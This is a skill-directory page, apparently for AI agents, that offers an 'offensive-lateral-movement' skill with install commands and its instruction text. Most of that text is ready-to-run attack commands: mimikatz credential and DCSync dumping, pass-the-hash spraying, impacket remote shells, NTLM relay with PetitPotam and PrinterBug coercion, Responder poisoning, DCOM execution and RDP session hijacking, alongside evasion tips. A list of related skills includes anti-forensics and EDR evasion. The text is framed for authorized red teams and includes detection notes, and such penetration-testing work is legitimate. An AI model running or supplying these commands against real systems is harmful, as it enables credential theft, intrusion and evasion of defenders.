offensive-lateral-movement skill
Comprehensive lateral movement tradecraft for authorized red team engagements covering credential-based movement (pass-the-hash, pass-the-ticket, overpass-the-hash), NTLM relay attacks (ntlmrelayx with PetitPotam, DFSCoerce, PrinterBug coercion), remote execution protocols (WMI, WinRM, DCOM, PsExec and alternatives), RDP session hijacking, and network pivoting through tunneling tools (chisel, ligolo-ng, SSH tunnels, SOCKS proxies). Provides operator-ready command sequences for mimikatz, crackmapexec/netexec, impacket suite, and evil-winrm with emphasis on OPSEC considerations, SMB signing bypass, and detection evasion. Maps to MITRE ATT&CK T1021 (Remote Services), T1550 (Use Alternate Authentication Material), and sub-techniques. Includes defender-perspective detection guidance for blue team awareness and a rapid engagement cheatsheet for common lateral movement scenarios encountered during internal penetration tests and assumed-breach exercises.
Is the offensive-lateral-movement skill safe?
Clean: nothing in its files matched our rules. We read 1 file in the folder on 2026-09-28.
No findings.
Install the offensive-lateral-movement skill
A skill is a folder. Copy it into your agent's skills folder and the agent loads it when the task matches its description.
git clone --depth 1 https://github.com/SnailSploit/Claude-Red.git /tmp/Claude-Red mkdir -p ~/.claude/skills cp -r /tmp/Claude-Red/Skills/post-exploitation/offensive-lateral-movement ~/.claude/skills/offensive-lateral-movement
In the Claude apps, zip the folder and upload it from the Skills settings. The folder on GitHub
The instructions your agent would load
SKILL.md as published, without the frontmatter. Read it on GitHub
Offensive Lateral Movement
Lateral movement is the phase where you expand access across a network after initial compromise. You pivot from one system to another using harvested credentials, token manipulation, or protocol abuse. The goal is to reach high-value targets -- domain controllers, database servers, file shares -- while minimizing detection footprint. Every technique here assumes you hold at least one valid credential or session token on the current host.
This skill covers credential-based movement, NTLM relay, remote execution protocols, session hijacking, and network tunneling. Apply these in authorized engagements only.
Quick Workflow
- Enumerate accessible hosts and open ports (445, 5985, 5986, 3389, 22, 135).
- Harvest credentials from the current host (LSASS, SAM, cached creds).
- Test credential reuse across discovered hosts with crackmapexec/netexec.
- Select a movement technique based on available credentials and target services.
- Establish persistence on the new host before moving further.
- Set up tunneling if you need to reach segmented networks.
- Document each pivot for your engagement report.
Pass-the-Hash
Pass-the-hash (PtH) lets you authenticate with an NTLM hash without knowing the plaintext password. You extract hashes from LSASS, the SAM database, or NTDS.dit, then inject them into authentication requests.
Extract hashes with mimikatz on the current host:
# Elevate to debug privilege and dump logon passwords
privilege::debug
sekurlsa::logonpasswords
# Dump SAM hashes (requires SYSTEM)
lsadump::sam
# Dump domain hashes from ntds.dit (on a DC)
lsadump::dcsync /domain:corp.local /all /csvUse crackmapexec (or netexec) to spray the hash across the network:
# Test a single hash against a subnet
crackmapexec smb 10.10.10.0/24 -u administrator -H aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
# Execute a command on a target via PtH
crackmapexec smb 10.10.10.50 -u admin -H <NT_HASH> -x "whoami /all"
# netexec (modern fork) with same syntax
nxc smb 10.10.10.0/24 -u admin -H <NT_HASH> --sharesUse impacket for shell access:
# PtH with psexec
impacket-psexec -hashes aad3b435b51404ee:<NT_HASH> corp.local/administrator@10.10.10.50
# PtH with wmiexec (stealthier, no service creation)
impacket-wmiexec -hashes aad3b435b51404ee:<NT_HASH> corp.local/administrator@10.10.10.50
# PtH with evil-winrm
evil-winrm -i 10.10.10.50 -u administrator -H <NT_HASH>OPSEC note: PsExec creates a service on the target (event 7045). Prefer wmiexec or evil-winrm when possible. Crackmapexec with --no-bruteforce prevents lockouts when testing multiple users against multiple hashes.
Pass-the-Ticket and Overpass-the-Hash
Pass-the-ticket (PtT) injects a stolen Kerberos TGT or TGS into your session, letting you authenticate as the ticket owner. Overpass-the-hash converts an NTLM hash into a Kerberos ticket, giving you Kerberos-based access from a hash alone.
Export tickets from memory with mimikatz:
# List all Kerberos tickets in memory
sekurlsa::tickets /export
# Inject a stolen TGT into the current session
kerberos::ptt C:\tickets\admin_krbtgt.kirbiOverpass-the-hash -- request a Kerberos TGT using an NTLM hash:
# Overpass-the-hash: create a new logon session with the hash
sekurlsa::pth /user:administrator /domain:corp.local /ntlm:<NT_HASH> /run:powershell.exeFrom Linux using impacket:
# Request a TGT with a hash (overpass-the-hash)
impacket-getTGT -hashes aad3b435b51404ee:<NT_HASH> corp.local/administrator
# Set the ticket in the environment
export KRB5CCNAME=administrator.ccache
# Use the ticket with psexec
impacket-psexec -k -no-pass corp.local/administrator@dc01.corp.localRequest a service ticket for a specific SPN:
# Get a TGS for CIFS service on a target
impacket-getST -spn cifs/fileserver.corp.local -hashes aad3b435b51404ee:<NT_HASH> corp.local/administratorOPSEC note: Kerberos authentication generates event 4768 (TGT request) and 4769 (TGS request). Overpass-the-hash produces an anomalous 4768 with RC4 encryption when AES is the domain default -- this is a known detection signal.
NTLM Relay Attacks
NTLM relay captures authentication attempts and forwards them to a target service. You coerce a machine to authenticate to your listener, then relay that authentication to another host where SMB signing is not enforced.
Check SMB signing across the network:
# Identify hosts without SMB signing required
crackmapexec smb 10.10.10.0/24 --gen-relay-list relay_targets.txt
# Alternative with nmap
nmap --script smb2-security-mode -p 445 10.10.10.0/24Set up ntlmrelayx to relay captured authentication:
# Relay to targets without SMB signing, dump SAM
impacket-ntlmrelayx -tf relay_targets.txt -smb2support
# Relay and execute a command
impacket-ntlmrelayx -tf relay_targets.txt -smb2support -c "whoami > C:\\relay_proof.txt"
# Relay to LDAP for delegation abuse or shadow credentials
impacket-ntlmrelayx -t ldaps://dc01.corp.local --shadow-credentials --shadow-target ws01$
# Relay to ADCS web enrollment for certificate theft
impacket-ntlmrelayx -t http://ca.corp.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainControllerCoerce authentication with PetitPotam (MS-EFSR abuse):
# Unauthenticated coercion (patched but often still works)
python3 PetitPotam.py <LISTENER_IP> <TARGET_DC_IP>
# Authenticated coercion
python3 PetitPotam.py -u user -p password -d corp.local <LISTENER_IP> <TARGET_DC_IP>Coerce with DFSCoerce (MS-DFSNM):
python3 dfscoerce.py -u user -p password -d corp.local <LISTENER_IP> <TARGET_DC_IP>Coerce with PrinterBug (MS-RPRN):
python3 printerbug.py corp.local/user:password@<TARGET_DC_IP> <LISTENER_IP>Set up Responder for poisoning and capture:
# Poison LLMNR/NBT-NS and capture hashes
responder -I eth0 -wFb
# Run in analysis mode first to identify traffic
responder -I eth0 -AOPSEC note: NTLM relay is noisy. Responder poisoning is detectable by monitoring for duplicate name resolution responses. PetitPotam coercion generates event 4624 type 3 logons from the DC to your listener.
Remote Execution Methods
Multiple protocols allow remote command execution once you have valid credentials. Each leaves a different forensic footprint.
WMI Execution
# impacket wmiexec -- semi-interactive shell via WMI
impacket-wmiexec corp.local/admin:Password1@10.10.10.50
# Execute a single command
impacket-wmiexec corp.local/admin:Password1@10.10.10.50 "ipconfig /all"
# With hash
impacket-wmiexec -hashes :<NT_HASH> corp.local/admin@10.10.10.50WMI does not create a service. Output is written to a temporary file on the ADMIN$ share and read back. Generates WMI event logs (Microsoft-Windows-WMI-Activity).
WinRM / PSRemoting
# evil-winrm interactive shell
evil-winrm -i 10.10.10.50 -u admin -p 'Password1'
# With hash
evil-winrm -i 10.10.10.50 -u admin -H <NT_HASH>
# Upload/download files
upload /local/path/payload.exe C:\Windows\Temp\payload.exe
download C:\Users\admin\Desktop\flag.txt /local/loot/flag.txt# Native PowerShell remoting
$cred = Get-Credential
Enter-PSSession -ComputerName 10.10.10.50 -Credential $cred
Invoke-Command -ComputerName 10.10.10.50 -Credential $cred -ScriptBlock { whoami }WinRM requires port 5985 (HTTP) or 5986 (HTTPS) open and the user in the Remote Management Users group (or local admin).
PsExec and Alternatives
# impacket psexec -- creates a service, uploads binary
impacket-psexec corp.local/admin:Password1@10.10.10.50
# smbexec -- no binary upload, uses cmd.exe service
impacket-smbexec corp.local/admin:Password1@10.10.10.50
# atexec -- scheduled task execution
impacket-atexec corp.local/admin:Password1@10.10.10.50 "whoami"
# dcomexec -- DCOM MMC20.Application or ShellWindows
impacket-dcomexec -object MMC20 corp.local/admin:Password1@10.10.10.50DCOM Lateral Movement
# Instantiate MMC20.Application on remote host
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","10.10.10.50"))
$com.Document.ActiveView.ExecuteShellCommand("cmd.exe",$null,"/c whoami > C:\dcom_proof.txt","7")
# ShellWindows method
$com = [activator]::CreateInstance([type]::GetTypeFromCLSID("9BA05972-F6A8-11CF-A442-00A0C90A8F39","10.10.10.50"))
$com.item().Document.Application.ShellExecute("cmd.exe","/c calc.exe","C:\Windows\System32",$null,0)DCOM requires port 135 plus dynamic RPC ports. Generates DCOM event logs (DistributedCOM 10016 errors are common indicators).
RDP Session Hijacking
If you have SYSTEM on a terminal server, you can hijack disconnected RDP sessions without knowing the session owner's password.
# List active sessions
query user
# Hijack a disconnected session (requires SYSTEM context)
# Session ID 2, redirect to your console session
tscon 2 /dest:console
# Create a service to run tscon as SYSTEM
sc create sesshijack binpath= "cmd.exe /k tscon 2 /dest:console"
net start sesshijackThis technique (T1563.002) is powerful on jump servers where administrators leave sessions disconnected. It produces event 4778 (session reconnected) and 4779 (session disconnected).
SSH Pivoting and Tunneling
When you land on a Linux host or a Windows host with OpenSSH, you set up tunnels to reach otherwise inaccessible network segments.
More skills from SnailSploit/Claude-Red
- Aoffensive-active-directoryActive Directory attack methodology for internal network red team engagements. Covers reconnaissance (BloodHound, PowerView, ADExplorer), credential abuse (Kerberoasting, ASREProasting, NTLM relay, LLMNR/NBT-NS poisoning), privilege escalation (ACL abuse, GPO abuse, unconstrained/constrained delegation), lateral movement (Pass-the-Hash, Pass-the-Ticket, Overpass-the-Hash, WMI/WinRM/PsExec), persistence (Golden/Silver/Diamond Tickets, DCSync, DCShadow, AdminSDHolder, Skeleton Key), forest trust attacks, ADCS abuse (ESC1-ESC15), and modern MDI/Defender for Identity evasion. Use when assessing on-prem AD, hybrid AD/Entra ID environments, or ADCS deployments.
- Aoffensive-advanced-redteamComprehensive red team operations methodology covering full engagement lifecycle from planning through reporting. Addresses engagement scoping and rules of engagement negotiation, multi-tier C2 infrastructure design with redirectors and domain fronting, malleable traffic profiles and beacon tradecraft, OPSEC discipline including attribution avoidance and indicator management, EDR and AMSI evasion techniques using direct syscalls and unhooking, data collection with chain-of-custody controls, and structured reporting with purple team debrief workflows. Covers assumed-breach, external-to-internal, insider threat, and hybrid physical-cyber engagement scenarios with MITRE ATT&CK mapping throughout. Targets operators planning or executing adversary simulation engagements against mature defenders.
- Coffensive-ai-security
- Aoffensive-anti-forensicsAnti-forensics and evidence destruction techniques for red team operators conducting authorized engagements. Covers log clearing on Windows (wevtutil, Clear-EventLog, ETW provider patching) and Linux (journal truncation, utmp/wtmp binary editing, syslog manipulation), timestamp manipulation via Timestomp and SetMACE to defeat timeline analysis, filesystem-level anti-forensics including NTFS Alternate Data Streams for payload hiding and secure deletion with sdelete/shred, memory artifact removal to counter live forensics, disk artifact manipulation targeting MFT entries and USN journal records, network forensics evasion through encrypted C2 channels and DNS-over-HTTPS tunneling, and anti-VM/sandbox detection to avoid dynamic analysis environments. Tools: Timestomp, wevtutil, sdelete, shred, MimiPenguin, Invoke-Phant0m. Aligns to MITRE ATT&CK T1070 (Indicator Removal), T1027 (Obfuscated Files or Information), T1497 (Virtualization/Sandbox Evasion). Each technique includes the forensic artifact it targets, the destruction or manipulation method, and the defender perspective so operators understand detection gaps they must account for.
- Aoffensive-api-abuseAdvanced API exploitation methodology focused on business logic abuse and sophisticated attack patterns that bypass traditional security controls. Covers business logic bypass through API call chaining and workflow manipulation. Addresses GraphQL-specific attacks including batching for credential brute-force, query depth exploitation, and introspection abuse. Includes pagination exploitation for data exfiltration, webhook hijacking for SSRF and data interception, and resource exhaustion through algorithmic complexity attacks. Covers race conditions in API transactions using parallel request techniques. Provides comprehensive JWT manipulation including algorithm confusion, kid injection, jku/x5u abuse, and claim tampering. Details API key leakage detection across source repositories, client-side code, and error messages. Covers undocumented endpoint discovery through predictable naming, debug routes, and source map analysis. Tooling includes Arjun, ParamSpider, jwt_tool, and GraphQL Voyager. Designed for authorized penetration testers targeting business logic layers that automated scanners miss.
- Aoffensive-api-securityComprehensive API security testing methodology covering REST, gRPC, and WebSocket attack surfaces. Addresses the full OWASP API Security Top 10 2023 including BOLA/IDOR, broken authentication, excessive data exposure, rate limiting bypass, BFLA, mass assignment, SSRF, and security misconfiguration. Includes REST-specific attacks such as HTTP verb tampering, content-type switching, and parameter pollution. Covers gRPC exploitation through protobuf interception, reflection API enumeration, and metadata injection. Addresses WebSocket vulnerabilities including origin bypass, message injection, and cross-site WebSocket hijacking. Provides tooling guidance for Burp Suite, Postman, grpcurl, websocat, and mitmproxy. Each technique includes detection signatures and defensive indicators so you understand what artifacts your testing leaves behind. Designed for authorized penetration testing engagements against API-driven architectures.
- Aoffensive-bluetooth-bleBluetooth Low Energy (BLE) attack methodology — GATT enumeration, characteristic read/write without auth, pairing downgrade (Just Works forced), LE Secure Connections bypass, MITM via active relay, sniffing with Sniffle (TI CC1352) / Ubertooth / Frontline, encryption key extraction (LE Legacy Pairing crackable, LE Secure Connections strong), proximity authentication abuse (cars, locks), and companion-app trust analysis. Use for IoT BLE devices, smart locks, fitness trackers, medical devices, BLE beacons, or any device pairing over BLE.
- Aoffensive-bluetooth-classicBluetooth Classic (BR/EDR) attack methodology — device discovery, service enumeration via SDP, LMP/L2CAP layer attacks, legacy PIN cracking (BlueBorne / KNOB), Bluetooth file-transfer abuse (BlueSnarfing legacy), unauthenticated profile abuse (HSP, HFP, OPP), and modern relevance against older industrial / automotive / accessory targets. Use when in-scope devices use Bluetooth Classic (Bluetooth ≤ 4.0 BR/EDR) — common in legacy car kits, industrial sensors, older medical devices, and audio accessories.
- Aoffensive-bug-identification
- Aoffensive-business-logicBusiness logic vulnerability testing for web/mobile/API engagements. Covers workflow bypass, state machine violations, multi-step process abuse, price/quantity/discount manipulation, currency confusion, coupon stacking, refund/chargeback abuse, race conditions on logic boundaries, parameter tampering for hidden flows, role/tenant boundary violations, time-of-check vs use, anti-automation defeat, fraud-detection evasion, and subscription/quota abuse. Use when scoping an application after surface-level OWASP Top 10 has been covered, or when the asset is a transactional/marketplace/fintech/e-commerce/SaaS app where logic flaws produce direct financial impact.
- Aoffensive-c2-frameworksCommand and Control framework deployment, configuration, and operational tradecraft for red team engagements. Covers Cobalt Strike (malleable C2 profiles, Beacon types HTTP/HTTPS/DNS/SMB, Beacon Object Files for in-memory execution, sleep and jitter tuning, named pipe pivoting), Sliver (implant generation across mTLS/WireGuard/DNS transport, operator multiplayer mode, armory extensions), Mythic (agent ecosystem with Apollo/Poseidon/Medusa, C2 profile configuration, translation containers), Havoc (Demon agent with sleep obfuscation via Ekko/Zilean, indirect syscalls, dotnet inline execution), Metasploit (msfvenom payload generation, multi/handler staging, Meterpreter post-exploitation modules), redirector architecture using Apache mod_rewrite and Nginx, domain fronting through CDN providers, DNS-based C2 for restrictive network egress, and TLS certificate management for infrastructure OPSEC. Tools: Cobalt Strike, Sliver, Mythic, Havoc, Metasploit Framework. Aligns to MITRE ATT&CK T1071 (Application Layer Protocol), T1573 (Encrypted Channel), T1090 (Proxy/Connection Proxy).
- Doffensive-cicd-pipelineComprehensive CI/CD pipeline exploitation methodology covering GitHub Actions injection vectors (expression injection via PR titles and issue bodies, workflow_run event abuse, GITHUB_TOKEN over-scoping, composite action supply chain compromise), Jenkins attack paths (Groovy sandbox escapes, script console remote code execution, Java remoting deserialization, credential store dumping, shared library injection), GitLab CI exploitation (YAML anchor injection, runner registration token abuse, CI variable extraction, protected branch bypass via merge request pipelines), and Azure DevOps pipeline agent compromise with service connection theft. Includes artifact poisoning techniques across all platforms, tooling guidance for gato and jenkins-attack-framework, and maps to MITRE ATT&CK T1195.002 (Supply Chain Compromise: Compromise Software Supply Chain). Covers enumeration of pipeline configurations, privilege escalation from contributor to code execution, lateral movement through pipeline trust boundaries, and persistence via modified workflow definitions. Each technique section provides working exploitation code, detection indicators, and defensive countermeasures.